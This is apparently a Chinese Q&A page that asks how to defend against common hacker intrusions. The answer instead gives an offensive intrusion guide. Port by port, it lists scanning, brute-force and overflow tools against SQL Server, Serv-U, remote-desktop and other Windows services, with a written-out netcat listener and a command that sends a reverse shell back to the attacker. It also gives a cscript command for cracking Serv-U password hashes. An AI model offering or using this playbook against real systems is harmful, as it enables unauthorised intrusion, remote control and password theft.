常见黑客入侵如何防范呢?

全部答案

  •   1。 1433端口入侵
    scanport。exe 查有1433的机器
    SQLScanPass。exe 进行字典暴破(字典是关键)
    最后 SQLTools。exe入侵
    对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
       nc -vv -l -p 本机端口 sqlhelloF。exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz。exe 入侵ip 1433 (这个是正向连接) 2。 4899端口入侵 用4899过滤器。
      exe,扫描空口令的机器 3。 3899的入侵 对很早的机器,可以试试3389的溢出 对2000的机器,可以试试字典暴破。 4。 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile。
      exe或dvup_delphi。exe) 可以利用SQL进行注入。(小榕的注入软件)。 5。 serv-u入侵(21端口) 对5。 004及以下系统,可用溢出入侵。(serv5004。exe) 对5。1。0。0及以下系统,可用本地提升权限。
      (servlocal。exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack。vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict。txt)的比较,得到密码。如:cscript crack。vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6。
       554端口 用real554。exe入侵。 7。 6129端口 用DameWare6129。exe入侵。 8。 系统漏洞 利用13 5、445端口,用ms0302 6、ms0303 9、ms0304 9、ms04011漏洞, 进行溢出入侵。
       9。 3127等端口 可以利用doom病毒开的端口,用nodoom。exe入侵。(可用mydoomscan。exe查)。 10。 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack。exe)。

    李***